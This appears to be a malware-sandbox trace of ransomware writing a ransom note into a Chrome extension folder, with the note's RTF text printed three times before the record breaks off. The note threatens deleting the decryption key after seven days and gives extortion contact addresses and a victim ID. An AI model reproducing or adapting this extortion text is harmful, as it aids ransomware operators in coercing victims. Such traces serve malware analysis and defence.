GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\#readme_eman#.rtf")) returned 0xffffffff [0286.480] GetLastError () returned 0x2 [0286.480] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.480] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.480] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.480] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2460ba8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring 